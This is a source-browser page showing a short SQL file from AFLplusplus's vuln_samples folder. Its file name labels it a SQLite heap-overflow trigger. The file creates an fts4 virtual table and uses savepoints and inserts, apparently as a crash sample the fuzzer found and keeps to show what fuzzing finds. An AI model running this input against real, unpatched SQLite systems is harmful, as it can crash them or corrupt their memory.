Sign in
android
/
platform
/
external
/
AFLplusplus
/
08cb3f8ab5cb4538182926436d203f266f09077b
/
.
/
docs
/
vuln_samples
/
sqlite-heap-overflow.sql
blob: 066fc835e9334ec43333647b8fdee7e361d5e7d2 [
file
] [
log
] [
blame
]
DROP
TABLE
IF
EXISTS
t
;
CREATE
VIRTUAL
TABLE
t0
USING
fts4
();
insert
into
t0
select
zeroblob
(
0
);
SAVEPOINT O
;
insert
into
t0
select
(
0
);
SAVEPOINT E
;
insert
into
t0
SELECT
0
UNION
SELECT
0
'x'
ORDER
BY
x
;